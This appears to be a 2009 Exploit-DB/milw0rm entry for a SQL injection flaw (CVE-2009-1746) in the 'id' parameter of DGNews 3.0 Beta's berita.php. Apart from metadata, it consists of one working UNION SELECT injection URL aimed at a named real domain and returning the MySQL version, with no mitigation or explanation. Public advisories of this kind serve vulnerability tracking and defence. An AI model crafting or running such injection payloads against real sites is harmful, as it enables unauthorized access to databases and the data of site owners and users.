DGNews 3.0 Beta - 'id' SQL Injection

Author: Cyber-Zone
type: webapps
platform: php
port: 
date_added: 2009-05-17 
date_updated:  
verified: 1 
codes: OSVDB-54658;CVE-2009-1746 
tags: 
aliases:  
screenshot_url:  
application_url: 

********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************

http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

mysql 5 :)

Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]